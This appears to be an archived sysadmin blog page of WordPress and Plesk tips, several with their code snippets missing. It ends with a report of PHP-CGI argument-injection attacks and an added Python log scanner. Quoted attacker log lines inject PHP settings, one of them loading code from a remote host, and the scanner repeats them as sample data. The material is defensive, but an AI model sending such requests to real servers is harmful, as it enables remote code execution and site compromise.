Archive | Web

WordPress Update & Plugin Install Problems

Recently I had a server that would not run WordPress updates or plugin installs no matter what I did. After extensive troubleshooting, it turned out the server had SELinux enabled, which disallows outbound connections from Apache.

One useful tool in troubleshooting update problems is the Background Update Tester plugin:

http://wordpress.org/plugins/background-update-tester/

It gives some extra detail on why updates can’t run.

Block wp-login.php On Single Site In WordPress Multi-Site

In the recent rash of wp-login.php brute force attacks, I needed a way to block access to wp-login.php on a single domain in a WordPress multi-site with many domains. The impact on customers of blocking all domains was too great so I needed a more targeted solution. Here’s what I came up with for the .htaccess file:


WordPress Multi-site On Plesk

It’s easy to set up WordPress in multi-site mode on Plesk.

Let’s assume you want to map:

to your multi-site installed on “acme.com”.

From an SSH login on the server, just edit the file:

If the file does not exist then create a new empty file.

Add the following line to the top of the file:

Save the file and tell Plesk to reconfigure:

Now restart Apache:

Now you’re ready to go with multi-site.

There’s an article here that addresses subdomain and webmail issues:

https://codex.wordpress.org/Configuring_Wildcard_Subdomains_for_multi_site_under_Plesk_Control_Panel


Local File Inclusion Attacks

We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:


91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"

This page explains the attack:

http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html

One of the compromised sites was ExpressionEngine and one was Drupal.

Here’s a bit of PHP code that I added to index.php to stop further attacks:

Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.
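As an added example (not code from the original post, and not the PHP snippet the post refers to), this Python script scans access-log lines for the request shape in the sample entries above: a query string that decodes to a run of "-d" switches setting allow_url_include or auto_prepend_file. The function names and the two benign log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Two entries quoted in the post (user agents shortened) + two constructed benign ones.
SAMPLE_LOG = """\
91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80"
192.0.2.10 - - [29/May/2013:09:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [29/May/2013:09:00:07 +0000] "GET /?s=-d+option HTTP/1.1" 200 3301 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Matches "-d name=value" and "-dname=value", the two spellings in the entries above.
INI_SWITCH = re.compile(r'-d\s*([A-Za-z0-9_.]+)=(\S+)')
WATCHED = {"allow_url_include", "auto_prepend_file"}


def classify(prepend):
    """Say where the prepended PHP code would come from."""
    if prepend.lower() == "php://input":
        return "request body"
    if re.match(r'(?i)(https?|ftp)://', prepend):
        return "remote URL"
    return "other" if prepend else "none"


def scan(lines):
    """Return one record per request whose query string is a run of switches."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or "?" not in m.group(4):
            continue
        ip, when, method, target, status = m.groups()
        query = unquote_plus(target.split("?", 1)[1])
        if not query.startswith("-"):  # ordinary key=value query string
            continue
        found = {k.lower(): v for k, v in INI_SWITCH.findall(query)}
        directives = {k: v for k, v in found.items() if k in WATCHED}
        if directives:
            hits.append({"ip": ip, "time": when, "method": method,
                         "status": int(status), "directives": directives,
                         "source": classify(directives.get("auto_prepend_file", ""))})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

A 200 status on a flagged line only shows the request was answered; whether the switches took effect has to be confirmed on the server itself.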
